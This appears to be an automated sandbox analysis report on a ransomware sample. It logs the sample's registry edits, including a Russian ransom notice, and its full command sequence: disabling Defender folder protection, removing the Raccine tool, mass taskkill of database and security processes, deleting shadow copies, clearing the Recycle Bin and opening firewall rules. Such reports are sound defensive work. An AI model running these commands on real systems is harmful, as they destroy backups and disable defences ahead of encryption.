PID 1088 wrote to memory of 1764	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 1088 wrote to memory of 1764	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 1088 wrote to memory of 324	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 1088 wrote to memory of 324	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 1088 wrote to memory of 324	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 1088 wrote to memory of 324	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 1088 wrote to memory of 536	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 1088 wrote to memory of 536	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 1088 wrote to memory of 536	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 1088 wrote to memory of 536	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 1088 wrote to memory of 2000	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 2000	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 2000	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 2000	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 668	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 668	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 668	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 668	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 896	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 896	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 896	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 896	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1728	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 1088 wrote to memory of 1728	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 1088 wrote to memory of 1728	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 1088 wrote to memory of 1728	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 1088 wrote to memory of 1592	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1592	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1592	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1592	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1656	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1656	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1656	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1656	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1904	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1904	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1904	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1904	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1544	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1544	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1544	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1544	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1532	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1532	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1532	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 1532	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 1088 wrote to memory of 652	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 1088 wrote to memory of 652	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 1088 wrote to memory of 652	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 1088 wrote to memory of 652	1088	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
"C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe"
1⤵
- Modifies extensions of user files
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1088
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1360
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1764
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:324
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:536
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2000
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:668
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:896
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1728
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1592
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1656
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1904
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1544
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1532
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:652
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1624
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1720
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:288
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:976
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1628
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:668
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1764
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1564
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:752
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1444
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1320
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1388
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:540
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:864
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1212
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:996
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1584
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1444
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:856
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1876
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1556
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1256
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:752
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1752
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1524
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1276
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1720
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RepairDisconnect.mov /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1560
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1812
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1656
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1744
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1092
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1320
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1484
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1544
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:864
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1492
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1912
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:752
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1616
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1468
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1880
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1152
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1604
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1752
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:984
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1932
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1416
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1732
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1624
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1524
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1320
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1156
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1944
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1776
